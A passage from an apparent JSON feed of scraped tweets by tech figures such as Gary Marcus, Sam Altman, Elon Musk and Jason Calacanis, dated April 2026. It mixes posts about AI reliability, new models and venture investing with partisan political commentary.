"https://nitter.net/elonmusk/status/2048589691054694406#m", + "published_at": "2026-04-27T02:26:57+00:00", + "source": "nitter", + "title_zh": "好奇与冒险是我的人生哲学\n\nhttps://grok.com/share/bGVnYWN5_d70e0164-cced-4096-99cb-38604067aa7a" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: “fails less often than a human does” is a terrible metric. \n \nWe build deterministic software and test it to destruction to ensure it’s 99.99999 reliable . That’s been the basis of every critical application such as accounting payroll and logistics. \n\nLLMs can’t get even close.", + "url": "https://nitter.net/SteveStricklan6/status/2048589239915577837#m", + "published_at": "2026-04-27T02:25:10+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: the beauty of a jagged frontier\nis that every failure is the user's fault\nand every breakthrough is the model's glory", + "url": "https://nitter.net/suchenzang/status/2048582672163995766#m", + "published_at": "2026-04-27T01:59:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Incredible writing from @euphoriaHBO", + "url": "https://nitter.net/Jason/status/2048580651985604783#m", + "published_at": "2026-04-27T01:51:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: I mean AI influencers here and everywhere are screaming you shouldn't get hired if you don't use agentic AI because you're deliberatly slowing everyone down and the moment something goes wrong it's your fault because you didn't understand the tool?", + "url": "https://nitter.net/BlackHackOfDoom/status/2048580122521780676#m", + "published_at": "2026-04-27T01:48:56+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: The only AGI that Sam Altman is after is Adjusted Gross Income.", + "url": "https://nitter.net/FrankRundatz/status/2048579079121555764#m", + "published_at": "2026-04-27T01:44:47+00:00", + "source": "nitter", + "title_zh": "@GaryMarcus 转发推文:Sam Altman 所追求的唯一 AGI(调整后总收入)就是调整后总收入。" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "the difference is that we don’t *hype* giving 12 year-olds bulldozers.\n\n*of course* it’s a kind of user error when a model destroys all of user’s data and they didn’t have a backup. that’s the point.\n\nvibe coding without considerable experience is like driving without a license.", + "url": "https://nitter.net/GaryMarcus/status/2048578055283880296#m", + "published_at": "2026-04-27T01:40:43+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "RT by @GaryMarcus: Never ever use generative AI for anything critical. \n\nThe technology is probablistic all the way down and therefore inherently unreliable. \n\nWhy is this so hard to understand? \n\nIt’s wild how many seemingly smart people have drunk the cool aid on this.", + "url": "https://nitter.net/SteveStricklan6/status/2048570082843082905#m", + "published_at": "2026-04-27T01:09:02+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Generative AI as the Hindenberg", + "url": "https://nitter.net/GaryMarcus/status/2048567837221089669#m", + "published_at": "2026-04-27T01:00:07+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Is it me or X starting to look like a vibe coded mess?\n\nPolls are broken.\n\nAccounts are getting hacked.\n\nMy DMs are full of phishing scams.\n\nBasics that used to work no longer work.", + "url": "https://nitter.net/GaryMarcus/status/2048558998325166498#m", + "published_at": "2026-04-27T00:25:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "so fun to see the reception to 5.5!\n\nthere is almost nothing that feels more gratifying to me than builders saying they find our tools useful.", + "url": "https://nitter.net/sama/status/2048554097985593849#m", + "published_at": "2026-04-27T00:05:31+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "R to @GaryMarcus: btw polling software is broken! votes aren’t showing, as many folks have noted. eg I see none:", + "url": "https://nitter.net/GaryMarcus/status/2048553390540734479#m", + "published_at": "2026-04-27T00:02:43+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Total AI disaster, totally predictable", + "url": "https://nitter.net/GaryMarcus/status/2048552931923013916#m", + "published_at": "2026-04-27T00:00:53+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "Our Principles:\n\nDemocratization, Empowerment, Universal Prosperity, Resilience, and Adaptability\n\nhttps://openai.com/index/our-principles/", + "url": "https://nitter.net/sama/status/2048552677433643427#m", + "published_at": "2026-04-26T23:59:53+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "Coders and software engineers ONLY:", + "url": "https://nitter.net/GaryMarcus/status/2048544989769257024#m", + "published_at": "2026-04-26T23:29:20+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Remember this", + "url": "https://nitter.net/elonmusk/status/2048543344746250466#m", + "published_at": "2026-04-26T23:22:48+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Grad school indoctrination camps", + "url": "https://nitter.net/elonmusk/status/2048535299102265720#m", + "published_at": "2026-04-26T22:50:49+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "We hired someone for the investing team. \n\nSomething I never planned to do. \n\nThey sent the team 3 new deals per day for 90 days straight. \n\nAll aligned to our stage, geography and deal type. \n\nThat’s how you hustle and get a job in VC. \n\nStay tuned. Reveal to come.", + "url": "https://nitter.net/HarryStebbings/status/2048531257399664920#m", + "published_at": "2026-04-26T22:34:46+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 🚨BREAKING: I found Cole Allen's archived tweets.\n\nHe predicted \"Kamala wins all swing states,\" compared Trump's win to “Nazis getting elected,” and moved to Bluesky.\n\nThe scary part: he retweeted every mainstream Democrat on this platform.\n\nThread below. 👇\n\nWhat radicalized him were the same talking points repeated every day on the left.", + "url": "https://nitter.net/KanekoaTheGreat/status/2048512831692452091#m", + "published_at": "2026-04-26T21:21:33+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.", + "url": "https://nitter.net/DavidSacks/status/2048502978626113625#m", + "published_at": "2026-04-26T20:42:24+00:00", + "source": "nitter" + }, + { + "handle": "GaryMarcus", + "account": "@GaryMarcus", + "name": "Gary Marcus", + "title": "getting so much phishing email in my X DMs. \n\neither a lot of accounts have been hacked or someone has discovered a back door to posting DMs.", + "url": "https://nitter.net/GaryMarcus/status/2048500820350750905#m", + "published_at": "2026-04-26T20:33:49+00:00", + "source": "nitter", + "title_zh": "X平台私信里收到大量钓鱼邮件,要么有很多帐户被黑了,要么有人发现了发送私信的后门。" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’ve invested in 700 private companies \n\nProviding liquidity and loans to high performing founders is completely standard. \n\nIn fact, investors encourage loans and secondary sales for founders to enable them to go for the Gold — which is exactly what SpaceX has done. \n\nThe @NYTimesPR is presenting this as a controversy, when in fact it’s the private company playbook in 2026. \n\nAnother hit job from the NYT", + "url": "https://nitter.net/Jason/status/2048487905543237675#m", + "published_at": "2026-04-26T19:42:30+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 of the best CEOs of the last 10 years. \n\nAdam Foroughi, Founder @AppLovin is easily top 3, ever. \n\n$160BN Market Cap \n\n$5.48BN Revenue\n\n$10M EBITDA per head \n\n82%+ margins\n\nJust 450 people in core business 🤯 \n\nNo other business on the planet has numbers like this. \n\nEpisode tomorrow 👇", + "url": "https://nitter.net/HarryStebbings/status/2048486182904852537#m", + "published_at": "2026-04-26T19:35:39+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs, lower unemployment, higher GDP in Democratic administrations than every GOP administration in the last 3 decades. Without fail.", + "url": "https://nitter.net/briantylercohen/status/2048469956627468510#m", + "published_at": "2026-04-26T18:31:11+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Ok @Acosta, balls in your court", + "url": "https://nitter.net/Jason/status/2048465651723882972#m", + "published_at": "2026-04-26T18:14:04+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The NYTimes focus last week was micro-looting, social murder and meaningless private company transactions designed to ferment class warfare.\n\nDisgraziad", + "url": "https://nitter.net/Jason/status/2048463405590225173#m", + "published_at": "2026-04-26T18:05:09+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Accurate", + "url": "https://nitter.net/elonmusk/status/2048456433981591867#m", + "published_at": "2026-04-26T17:37:26+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Falcon 9 launches 25 @Starlink satellites from California", + "url": "https://nitter.net/SpaceX/status/2048453949381091634#m", + "published_at": "2026-04-26T17:27:34+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950.\n\nThe National Science Board is the independent body that oversees the National Science Foundation, the agency that distributes $9 billion in research grants every year. \n\nIts members are scientists and engineers from universities and industry. They serve six-year staggered terms specifically so they cross presidential administrations and stay independent of whoever is in power.\n\nOn Friday, every single one of them got the same boilerplate email from Mary Sprowls of the Presidential Personnel Office: \"On behalf of President Donald J Trump, I am writing to inform you that your position as a member of the National Science Board is terminated, effective immediately. Thank you for your service.\"\n\nThat's it. That's the whole letter. For 76 years of institutional independence.\n\nThe NSF funds the basic science behind MRIs. Cellphones. LASIK eye surgery. GPS. The internet itself. The Antarctic research stations. The deep-space telescopes. The research vessels mapping the ocean floor. Every breakthrough that made America the world's leader in science for the better part of a century traces back through grants this agency made and this board approved.\n\nThe board chair, Victor McCrary, was actively advising Congress on Trump's proposed 55% cut to NSF's budget. The board was helping fight back. So Trump fired the board.\n\nMarvi Matos Rodriguez, one of the fired members, told reporters she had been reviewing an 80-page report as part of her board duties just days before being terminated. \n\nKeivan Stassun, a physicist at Vanderbilt, said NSF's leadership had already stopped responding to board oversight requests months ago. \"We would ask them, 'Are you following board governance directives?' And their answer would be, in effect, 'We don't listen to you anymore.'\"\n\nNow there's no board to answer to.\n\nRep. Zoe Lofgren of California, the top Democrat on the House Science Committee, called it \"the latest stupid move made by a president who continues to harm science and American innovation. Will the president fill the NSB with MAGA loyalists who won't stand up to him as he hands over our leadership in science to our adversaries?\"\n\nThat's the actual question. \n\nBecause while Trump is firing American scientists, China is building research universities at a rate we cannot match. The CDC just buried a study showing vaccines work.\n\n RFK Jr. runs HHS. The EPA is gutted. The Forest Service is being broken. Half of American children are breathing dangerous air. And now the people who decide what gets researched in the United States have all been fired by email on a Friday afternoon.", + "url": "https://nitter.net/Gianl1974/status/2048453901930660058#m", + "published_at": "2026-04-26T17:27:23+00:00", + "source": "nitter", + "title_zh": "@ylecun 转推:特朗普刚刚通过电子邮件解雇了国家科学委员会的24名成员,没有任何预警,也没有给出任何理由。这个委员会自1950年以来一直存在。国家科学委员会是独立监管国家科学基金会的机构,该机构每年分配90亿美元的研究经费。委员会成员由来自大学和工业界的科学家与工程师组成,其六年任期的特殊设计是为了跨越总统任期,以保持不受掌权者的干扰。周五,所有成员都收到了同样标准格式的邮件,邮件由总统人事办公室的玛丽·斯普劳尔斯发出:“我谨代表美国总统唐纳德·J·特朗普通知您,您在国家科学委员会成员的职位…”" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Who made this?!", + "url": "https://nitter.net/Jason/status/2048450286902235560#m", + "published_at": "2026-04-26T17:13:01+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: In shocking news, calling your political opponents Nazis makes crazy people want to kill them. Who could have predicted this?", + "url": "https://nitter.net/KonstantinKisin/status/2048448438715445382#m", + "published_at": "2026-04-26T17:05:40+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "I’m proud to announce I’m hosting an exhibition cage match between @Acosta and @mtracey on July 4th \n\n$100,000 cash prize \n\nVegas \n\n3, 3 minute rounds", + "url": "https://nitter.net/Jason/status/2048437340218044499#m", + "published_at": "2026-04-26T16:21:34+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Once again, the substack party result in a Donnybrook — it’s like the source awards for wordmaxxers", + "url": "https://nitter.net/Jason/status/2048436081725464959#m", + "published_at": "2026-04-26T16:16:34+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: 25% of very liberal people say political violence can “sometimes be justified.”\n\nAmong very conservative people it’s just 3%.\n\nIn other words, the far left is 8x more likely to support political violence as the far right.\n\nStop pretending this is a “both sides” problem. It’s not.", + "url": "https://nitter.net/RobertMSterling/status/2048435593244237849#m", + "published_at": "2026-04-26T16:14:38+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. \n\nPoliticians never waste a good fake crisis, which is why they're perfect for Bernie to try to seize the means of production back from the private sphere.\n\nImagine if a mainstream politician put the Heaven's Gate suicide cult on the platform in 1997?\n\nThat's where we are in American politics at the edges today. \n\nWe've jumped the shark into the absurd and we've completely lost the thread of reality in America today.\n\nAnd it isn't AI that caused this madness. It is good old fashioned human hallucination, story telling and delusion.\n\nSociety should never make policy about imaginary future threats that have no actual basis in reality. AI is already used by billions and it is nothing like what people imagined it to be and we're all still here and the problems have been ridiculously minimal even by the standards of past tech revolutions.\n\nIf I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? The answer is yes because it's cars. You probably got in one today and accepted that risk and never even thought about it.\n\nIn contrast, the amount of people who died or were injured by AI is a tiny fraction of a percent and even those cases are probably specious at best.\n\nIn fact, AI has actually saved countless lives. It's saved lives through drug discovery by helping create the COVID and flu vaccines. It's saved lives through anti-lock breaks. It's saved lives with self driving cars that are 10X safer than human drivers and yet the only thing you read about self driving cars in the news are the incredibly rare stories of the very few times it did actually kill a dog or injure someone.\n\nIf that sounds irrational and insane that's because it is.\n\nWe're worried about a technology with a nearly perfect track record of safety and are totally fine with a technology that kills people every day?\n\nWelcome to the irrationality of the human mind!\n\nIf the pause AI cult had their way we'd still be stuck on GPT2 which was a hallucinating mess and we'd have made no progress to the much more sound and highly aligned and intelligent and useful models we have now.\n\nThat's because you can't make progress by imagining it in your mind or writing idiotic essays on Less Wrong to other mental masturbators. \n\nYou solve problems in the real world through trial and error. \n\nThe way to make AI safe is by building it and iterating in the real world. \n\nThere is no other way.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048432684930654430#m", + "published_at": "2026-04-26T16:03:04+00:00", + "source": "nitter", + "title_zh": "由@ylecun转发:存在主义风险制造恐慌者只是一个小型但极为吵闹的邪教,拥有精妙的人工造势能力。\n\n政治家从不会浪费一个能创造良好话题的假危机,这就是为什么这对想从私人领域重新夺取生产资料的伯尼来说简直天衣无缝。\n\n想象一下1997年一位主流政治人物把天堂之门自杀邪教搬到舞台中央会怎样?\n\n这正是当今美国政治边缘的现实。\n\n我们已经跳进荒唐的鲨鱼池,如今也彻底失去了把握现实的根基。\n\n造成这种疯狂的也并非AI本身,而是人类长期以来的妄想、杜撰和痴迷。\n\n社会永远不应该因虚构的未来威胁就制定政策,这些威胁根本无任何现实基础。人工智能如今已经被数十亿人所使用和i" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "If they’re willing to die to assassinate, imagine what they will do if they gain political power", + "url": "https://nitter.net/elonmusk/status/2048428921536868583#m", + "published_at": "2026-04-26T15:48:07+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://nitter.net/sama/status/2048428561481265539#m", + "published_at": "2026-04-26T15:46:41+00:00", + "source": "nitter", + "title_zh": "感觉现在是时候认真重新思考操作系统和用户界面的设计了。 \n(还有互联网;应该有一个协议能被人类和代理程序同等使用)" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: Deployment of 25 @Starlink satellites confirmed", + "url": "https://nitter.net/SpaceX/status/2048427420366324024#m", + "published_at": "2026-04-26T15:42:09+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"post-AGI, no one is going to work and the economy is going to collapse\"\n\n\"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stretches and miss out on working\"", + "url": "https://nitter.net/sama/status/2048426122854228141#m", + "published_at": "2026-04-26T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Seeing two types of founders emerge in this moment:\n\nThe tourists and the terminators. \n\nThe terminators are salivating at the opportunity ahead. Hungrier than ever. More ambitious than ever. They want it more than ever. \n\nThe tourists. They want to sell. They are scared. They do not want to commit 10 years to such uncertainty. \n\nPack is separating.", + "url": "https://nitter.net/HarryStebbings/status/2048418806867870115#m", + "published_at": "2026-04-26T15:07:55+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by the handle http://ColdForce.bsky.social with multiple references violence and guns.\n\nIn one post he calls President Trump the Antichrist.\n\nIn another he recommends buying guns in reaction to Trump’s DOJ exploring ways to ban firearm purchases from transgenders.\n\nIn one post he calls Trump a sociopathic mob boss and in another referred to him as a traitor with known connections to Putin, repeating a favorite leftwing Russian Hoax talking point.\n\nHe also attacks JD Vance for advocating an end to America’s funding the war in Ukraine and for his criticisms of the Pope. He seems pretty fixated on Ukraine more generally.\n\nHe also frequently interacts with Will Stancil’s Bluesky account, among others.", + "url": "https://nitter.net/AndrewKolvet/status/2048417712439689346#m", + "published_at": "2026-04-26T15:03:35+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Yeah okay, Lego bros, brodettes and brotheys are cooked with this one.\n\nGPT 2 Image can create full Lego sets! With actual Bricklink IDs so you can order the parts and build it.\n\nWhole new business opportunity here for the taking.", + "url": "https://nitter.net/DennisonBertram/status/2048413815675539816#m", + "published_at": "2026-04-26T14:48:06+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Every post, I block and report a couple accounts using AI-generated replies. It feels much the same as picking up litter on a city street; I don't know if it has any effect, but it feels like I ought to at least try to keep the site clean.", + "url": "https://nitter.net/paulg/status/2048413578789634100#m", + "published_at": "2026-04-26T14:47:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Durer was the original Dr Seuss.", + "url": "https://nitter.net/paulg/status/2048411898081583547#m", + "published_at": "2026-04-26T14:40:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Writing a talk to give in Stockholm. The prospect of speaking to a large group of people is no longer frightening, but writing a talk is as much work as ever. I'm no longer afraid of audiences, but I'm still just as afraid of making mistakes.", + "url": "https://nitter.net/paulg/status/2048411021329453562#m", + "published_at": "2026-04-26T14:36:59+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "The best founders I know all text their investors. \n\nNone of them email them. \n\nThe relationship will blossom and deepen in a matter of messages.", + "url": "https://nitter.net/HarryStebbings/status/2048400836024283246#m", + "published_at": "2026-04-26T13:56:31+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: Random pic of @Jason protecting our $TAO bags", + "url": "https://nitter.net/nordin_eth/status/2048399674269213067#m", + "published_at": "2026-04-26T13:51:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Shooting oneself in the foot?\nNope.\nShooting oneself in the prefrontal cortex.", + "url": "https://nitter.net/ylecun/status/2048399621492236615#m", + "published_at": "2026-04-26T13:51:41+00:00", + "source": "nitter", + "title_zh": "自己朝自己脚上开枪?\n不。\n是在前额叶皮质开枪。" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 'Action is now needed': Over 60 ex-U.K. ambassadors call to sanction Israel over West Bank\nhttps://www.haaretz.com/west-bank/2026-04-26/ty-article/.premium/over-60-ex-uk-ambassadors-call-to-sanction-israel-over-west-bank/0000019d-c950-d11b-a7df-ef5a5fba0000", + "url": "https://nitter.net/haaretzcom/status/2048396013816152216#m", + "published_at": "2026-04-26T13:37:21+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: How do you think the left redistributes wealth?\n\nViolence\n\nHow do you think the left seizes the means of production?\n\nViolence\n\nHow do you think they censor and surveil opponents?\n\nViolence\n\nWhat do you think the left means by “the struggle”?\n\nViolence", + "url": "https://nitter.net/TheAliceSmith/status/2048390094529216982#m", + "published_at": "2026-04-26T13:13:50+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "Good use of camouflage by Biscuit.", + "url": "https://nitter.net/paulg/status/2048370801833828507#m", + "published_at": "2026-04-26T11:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯\n\nSabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!!\n\nHe makes history as the first man to officially break 2 hours in the marathon.\n\nYomif Kejelcha 🇪🇹 in his debut ran 1:59:41 to become 2nd fastest alltime, while Jacob Kiplimo 🇺🇬 finished in 2:00:28.\n\nAll under the previous World Record.", + "url": "https://nitter.net/TrackGazette/status/2048351736037826877#m", + "published_at": "2026-04-26T10:41:25+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories.\n\nIf you're on either side of this slider, congratulations, you may be a child in an adult costume body!\n\nBlack and white thinking is for children. \n\nWhen you become an adult it's time to put away childish things.", + "url": "https://nitter.net/Dan_Jeffries1/status/2048293118781296734#m", + "published_at": "2026-04-26T06:48:29+00:00", + "source": "nitter", + "title_zh": "由@ylecun转发:永远不要让理性思考阻碍极端幻想故事。\n\n如果你在这枚滑块的任意一侧,恭喜你,你可能是一个穿着成人外衣的孩子!\n\n黑白分明的思维方式属于孩童时代。\n\n当你成为成年人时,是时候放下这些幼稚的想法了。" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Yeah", + "url": "https://nitter.net/elonmusk/status/2048271866914083172#m", + "published_at": "2026-04-26T05:24:02+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "Major", + "url": "https://nitter.net/elonmusk/status/2048271324577952130#m", + "published_at": "2026-04-26T05:21:53+00:00", + "source": "nitter" + }, + { + "handle": "elonmusk", + "account": "@elonmusk", + "name": "Elon Musk", + "title": "RT by @elonmusk: \"You can make an AI go insane if you force it to believe things that aren't true - AI must be maximally truth-seeking\"\n\n—Elon Musk", + "url": "https://nitter.net/XFreeze/status/2048266495059181608#m", + "published_at": "2026-04-26T05:02:42+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "The left has a serious violence problem, which @DavidSacks called out early and often. \n\nThis generation of woke democratic socialists are morally bankrupt. \n\nThey believe in looting and violence as a political tool — and they’re vocal about it. \n\nIf you called out the violent members of the January 6th riots, you also have to call out the radical left. \n\n#ballsandstrikes https://x.com/EndWokeness/status/2048217117221065201/video/1", + "url": "https://nitter.net/Jason/status/2048249992163242220#m", + "published_at": "2026-04-26T03:57:07+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "If you’re not condemning these lunatics, you’re advocating for the end of the American empire. \n\nI’m not for canceling people, but the fact the @nytimes and @newyorker not only employees these individuals, but selects them to represent their brands, shows exactly how bankrupt they are.", + "url": "https://nitter.net/Jason/status/2048247267182658004#m", + "published_at": "2026-04-26T03:46:17+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "Heroes 🫡", + "url": "https://nitter.net/Jason/status/2048245718171648271#m", + "published_at": "2026-04-26T03:40:08+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Saturday song\n\nhttps://youtu.be/D8MoLNxLE98?si=yRsm9viuy3NYvnJ0", + "url": "https://nitter.net/eladgil/status/2048230781739581745#m", + "published_at": "2026-04-26T02:40:47+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day", + "url": "https://nitter.net/SebastienBubeck/status/2048224374264885396#m", + "published_at": "2026-04-26T02:15:19+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "how can they write code so fast?!", + "url": "https://nitter.net/sama/status/2048165186482389253#m", + "published_at": "2026-04-25T22:20:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: (and we will fix the former)", + "url": "https://nitter.net/sama/status/2048160448340767038#m", + "published_at": "2026-04-25T22:01:18+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we still get looksmaxxed on frontend a little but we IQmog hard now", + "url": "https://nitter.net/sama/status/2048160404376105179#m", + "published_at": "2026-04-25T22:01:08+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "x.com/i/spaces/1nGeLyjZrkvKX", + "url": "https://nitter.net/Jason/status/2048151434928017429#m", + "published_at": "2026-04-25T21:25:29+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing.\" https://ebx.sh/V5TJjQ", + "url": "https://nitter.net/PhillyInquirer/status/2048118689258487857#m", + "published_at": "2026-04-25T19:15:22+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "nightmare blunt rotation", + "url": "https://nitter.net/Jason/status/2048116521436590260#m", + "published_at": "2026-04-25T19:06:45+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "today #knicks \n\n@mikal_bridges to 6th man/leads the bench in scoring \n\nKnicks play @23savage____ 26 minutes, he has 5 offensive boards \n\nWe're up 20+ points in the second half \n\n@ATLHawks backs broken; they realize we've figured it out \n\nseries over \n\n@nyknicks in six", + "url": "https://nitter.net/Jason/status/2048116362766127514#m", + "published_at": "2026-04-25T19:06:07+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to make sure that all of our industries do well. Crypto's a big industry.\"", + "url": "https://nitter.net/RapidResponse47/status/2048111588930986354#m", + "published_at": "2026-04-25T18:47:09+00:00", + "source": "nitter" + }, + { + "handle": "jason", + "account": "@jason", + "name": "Jason Calacanis", + "title": "RT by @Jason: AngelList introduced USVC: venture investing for non-accredited investors starting at $500. Hear why Jason thinks the social media criticisms lack merit and says: \"More liquidity for investors is always a 